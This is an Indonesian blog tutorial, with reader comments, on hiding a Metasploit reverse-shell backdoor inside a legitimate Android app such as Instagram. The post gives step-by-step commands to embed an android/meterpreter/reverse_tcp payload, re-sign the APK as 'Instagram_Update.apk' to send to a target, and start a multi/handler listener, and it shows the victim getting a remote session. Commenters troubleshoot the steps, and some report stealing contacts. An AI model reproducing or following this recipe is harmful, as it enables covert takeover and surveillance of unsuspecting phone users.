Kalau untuk mengelabui target user windows dengan membuat backdoor dengan format file tertentu mungkin sudah biasa ya, karena memang sudah banyak module exploit yang digunakan untuk membuat backdoor dengan format file tertentu(.pdf, .doc, .rar). lalu bagaimana jika target exploit kita android, dan bagaimana untuk menyamarkan backdoor tersebut ? oke di bawah ini akan saya berikan contoh cara menyisipkan backdoor kedalam file apk.

Bagi yang mau mencoba bisa download bahannya disini
Extract file tersebut lalu masukkan file apk yang akan di sisipi backdoor ke dalam folder apk-embed jadi satu dengan apk-embed-payload.rb. sebagai contoh disini saya akan menyisipkan backdoor kedalam file apk instagram

Nah untuk memasukkan payload ke dalam file apk tersebut perintahnya seperti ini
ruby apk-embed-payload.rb [target.apk] [msfvenom options]
Contoh
ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1337
ruby apk-embed-payload.rb [target.apk] [msfvenom options]

Tunggu hingga prossesnya selesai, jika berhasil nantinya akan ada file baru yang telah disisipi backdoor dengan nama namafile_backdoored.apk
namafile_backdoored.apk

Selanjutnya adalah melakukan SignApk, tujuannya agar file apk yang telah di sisipi backdoor tersebut bisa di install di semua device android.
Caranya, masukkan file apk hasil backdooring kedalam folder SignApk. lalu lakukan sign dengan perintah dibawah ini
java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]
Contoh
java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk
java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]
Nah diatas file hasil sign saya beri nama Instagram_Update.apk dan file siap di kirim ke target. namun sebelumnya buka msfconsole, set seperti di bawah ini
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 1337
exploit
lhost dan lport sesuaikan dengan yang kalian gunakan.

Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi.
install backdoorbackdoor installed
Tidak beda dengan aslinya kan

Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreternya
backdoor opened

meterpreter sessions opened
Bagi yang masih penasaran kalian bisa lihat video di bawah ini

Tutorial ini hanya ntuk pengetahuan semata, jika ada penyalahgunaan dari tutorial ini bukan tanggung jawab dari saya.
Saya harap dengan dibuatnya postingan ini dapat membuat kita agar lebih berhati-hati apabila mendownload aplikasi dari sumber yang tidak terpercaya. Selalu download aplikasi dari website resmi atau dari google play.
Oke, mungkin cukup itu yang bisa saya sampaikan mengenai Cara Menyisipkan Backdoor kedalam File Apk, semoga bermanfaat.
source https://gist.github.com/SkullTech

Posting Komentar

  1. gan pas ane masukin backdoor ke apk, knapa ga masuk yaa bacaan nya no jarsigner

    BalasHapus
  2. When i was added at bottom:
    `d2j-apk-sign #{injected_apk}`
    or
    manualy sign file in terminal:
    d2j-apk-sign file_backdoored.apk

    apk file was working :)

    BalasHapus
    Balasan
    1. kasih liat dong scriptnya broo

      Hapus
    2. Kalau muncul no jarsigner buka new session dan ketik pkg install openjdk-17
      Dan kembali jika muncul no apktool kembali ke session tadi dan ketik pkg install apktool

      Hapus
  3. Gan Anher Minta Tema Kali linux nya dong..

    BalasHapus
  4. Gan... mau nanya nie, ane pake kali ver 2016.1 64bit kok gk bisa gan? apa file apk y kudu instagram? terima kasih

    BalasHapus
    Balasan
    1. gak harus instagram kok, udah sy coba di apk lain dan berhasil, tapi ad juga beberapa file apk yg emg gk bisa d inject

      Hapus
    2. Gan solusi no jarsigner gmna nih?

      Hapus
  5. ko ane pas ruby apk-embed-payload.rb langsung eror. tulisannya bla bla bla trakhirnya install fw trus ada link docs.google gitu, trus ada tulisan download 2 last ..... apa gtu lupa.
    itu knpa?

    BalasHapus
  6. untuk bisa masuk sesi meterpreternya harus konek internet tidak ? dan jika ya, harus pakai wlan0 atau eth0?

    BalasHapus
  7. gan pass backdoorny di install ko muncul tulisan "kesalahan saat mengurai paket" itu kenapa mas anherr please answer :)

    BalasHapus
  8. gan saat ketik ruby....muncul ruby command not found gimana gan ngatasinnya ?? minta pencerahan

    BalasHapus
  9. untuk file zip yang di download apakah ada backdoornya? atau jangan jangan ada keyloggernya? mohon min di jawab.

    BalasHapus
  10. dan apa ini bekerja di beda jaringan?

    BalasHapus
    Balasan
    1. bisa di beda jaringan gan

      Hapus
    2. apa caranya sama kayak yang di atas gan kalo untuk beda jaringan?

      Hapus
    3. nyimak, eh btw biar terminal bisa di ringkas gitu gmn caranya?

      Hapus
  11. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  12. bang mau nanya ini kenapa pas proses ruby apk-embed-payload.rb easytouch.apk -p android/meterpreter/reverse_tcp lhost=124.XXX.XX.XX lport=2080
    malah yang keluar bukan proses bikin backdoor nya malah keluar ini Apktool version Apktool v1.5.2.....jawab bang secepatnya,Terimakasih
    #Kali_Linux_Rolling

    BalasHapus
  13. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  14. gan kok pas proses ruby apk-embed-payload.rb LINE.apk -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=333
    langsung ada pemberitahuan .....
    For additional info, see: http://code.google.com/p/android-apktool/
    For smali/baksmali info, see: http://code.google.com/p/smali/
    not supported, please download the latest 2. version from git.
    malah keluar apktool version
    mohon pencerahannya gan...

    BalasHapus
  15. gan mau nanya setelah di inject backdoor apknya kok gk keluar namafile_backdoor.apk??

    BalasHapus
  16. Apa ini permanent gan ? Mohon bantuan ?

    BalasHapus
  17. min bisa minta tolong gk? kalo startup kali linux lamaaaaa buanget itu knpa ya?

    BalasHapus
  18. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  19. gan ane mau nanya,,, waktu dijalankan ruby apk-embed-payload.rb 3D-Chess-Game.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.86 LPORT=10001

    kok malah muncul pemberitahuan kaya gini ya??
    /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- nokogiri/nokogiri (LoadError)
    from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
    from /usr/lib/ruby/vendor_ruby/nokogiri.rb:29:in `rescue in '
    from /usr/lib/ruby/vendor_ruby/nokogiri.rb:25:in `'
    from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
    from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
    from apk-embed-payload.rb:9:in `'

    Kasih pencerahan buat saya gan.... Makasih :D

    BalasHapus
  20. gan ane mau nanya,,, waktu dijalankan ruby apk-embed-payload.rb 3D-Chess-Game.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.86 LPORT=10001

    kok malah muncul pemberitahuan kaya gini ya??
    /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- nokogiri/nokogiri (LoadError)
    from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
    from /usr/lib/ruby/vendor_ruby/nokogiri.rb:29:in `rescue in '
    from /usr/lib/ruby/vendor_ruby/nokogiri.rb:25:in `'
    from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
    from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
    from apk-embed-payload.rb:9:in `'

    Kasih pencerahan buat saya gan.... Makasih :d

    BalasHapus
  21. Cara mengetahui lhost nya gmn?

    BalasHapus
  22. Master sy mau tanya ketika apk originalnya sudah di masukan backdoor apa aplikasinya masih bisa berjalan seperti biasa ketika sudah di instal.??

    BalasHapus
  23. Mau nanya mastah, itu ngirim result nya kemana?
    Kalo harus mantengin gitu mah cape-cape, mending pake teknik scampage.
    kirain bisa ngirim result nya ke email -_-

    BalasHapus
  24. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  25. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  26. Min Ane kan udah berhasil nih tapi kenapa klo eksekusi command nya selalu ada tulisan "Operation failed: 1" ?

    BalasHapus
  27. bang itu pake metasploit/apa ?

    BalasHapus
  28. Gan kl di jaringan wifi,untuk lhostnya gemana gan

    BalasHapus
  29. Gan kl di jaringan wifi,untuk lhostnya gemana gan

    BalasHapus
  30. Masuk backdoor nya gmna...Anher?

    BalasHapus
  31. Makasih Work 100% Beda Jaringan..
    Numpang Promote Sekalian https://ilmukomputer1313.blogspot.co.id/
    Makasih

    BalasHapus
  32. bang mau nanya kok pas proses ># java -jar signkapk.jar testkey.x509.pem testkey.pk8 instafollowers.apk instafollowers_backdoored.apk
    Error: Unable to access jarfile signkapk.jar
    bacaannya eror trus cara mengetahui file hasilsign yang mana file awal saya namanya instafollowers.apk sesudah di inject menjadi instafollowers_backdoored.apk
    mohon jawabannya

    BalasHapus
  33. Bang minta apk yg sudah di susupi backdoor

    BalasHapus
  34. work tapi ketika pengen coba dump_contacts ada warning "error getting contacts list : bla bla bla" itu kira-kira kenapa ya mas?

    BalasHapus
  35. bang kalo misalnya ane masukin backdoor ke apk instagram, dan di android korban itu udah keinstall instagram,nah kan kalo ane install backdoornya sama aja kaya update aplikasinya tuh, kira kira bisa ga?

    BalasHapus
  36. beda jaringan harus pakai vpn

    BalasHapus
  37. android 7.1 nougat fc mulu gan
    8-)

    BalasHapus
  38. Maaf Admin, ane mau tanya. itu instagram versi berapa ya. saya pake instagram terbaru could not find smali file. tapi pas inject facebook lite itu work. Makasih sebelumnya. :D

    BalasHapus
  39. bang setelah step ini kok gak ada file baru yg blakangnya backdored ya
    [*] Signing Instagram_backdoored.apk ..
    [+] Infected file Instagram_backdoored.apk ready

    BalasHapus
  40. gan. gue cape bnget cari solusinya ni.
    gue udah ikutin semua tutorial punya lo yg ini. . tapi waktu gw coba di andorid dalam satu jaringan, gw masukin ip address gw di andoid tersebut gak mau terbuka. . solusi dari lo dong gan?

    BalasHapus
  41. apa di windows work gan anher

    BalasHapus
  42. Min ane udah coba, tapi pas instal backdored.apknya kaga bisa, "Kesalaham mengurai paket" gimana tuh min?

    BalasHapus
  43. pas mau diinstall ke android kok ps mau di buka . apk nya mental gan

    BalasHapus
  44. Kalau pake ahmyth gimana cara memasukan backdoornya kedalam apk ?

    BalasHapus
  45. Perkenalkan, saya dari tim kumpulbagi. Saya ingin tau, apakah kiranya anda berencana untuk mengoleksi files menggunakan hosting yang baru?
    Jika ya, silahkan kunjungi website ini www.kbagi.com untuk info selengkapnya.

    Di sana anda bisa dengan bebas share dan mendowload foto-foto keluarga dan trip, music, video, filem dll dalam jumlah dan waktu yang tidak terbatas, setelah registrasi terlebih dahulu. Gratis :)

    BalasHapus
  46. mas saya mau naya bagaimana kita masuk kembali ke backdor setelah putus koneksi karena saya menggunakan ip publick
    ..balas ya mas

    BalasHapus
  47. Min ini os linux yah?? Soalnya ane masih pake win 10?? Answer min

    BalasHapus
  48. [*] Generating msfvenom payload..
    [*] Signing payload..
    [*] Decompiling orignal APK..
    [*] Decompiling payload APK..
    [*] Locating onCreate() hook..
    [!] Unable to find correct hook automatically

    ini gimana bang?

    BalasHapus
  49. No jarsigner
    terus om, ini gimana ya?

    BalasHapus
  50. assalumalaikum.,,gan saya ada trouble nihh,,,saya menggunakan win 10 saya coba untuk embed apk itu dengan apk-embed-payload.rb tapi setelah saya coba,,gagal.dan minta untuk jarsigner di instal?? jaraigner tersebut gimana gan cara nya dan solusinya...

    BalasHapus
  51. Di Lakukan Di Termux Bisa Apa Nggak ini??

    BalasHapus
  52. Min kalo pake linux d termux bisa gk buat nyisipkan trojannya

    BalasHapus
  53. kalo perintah untuk termux apakah juga berbeda?

    BalasHapus

 
Top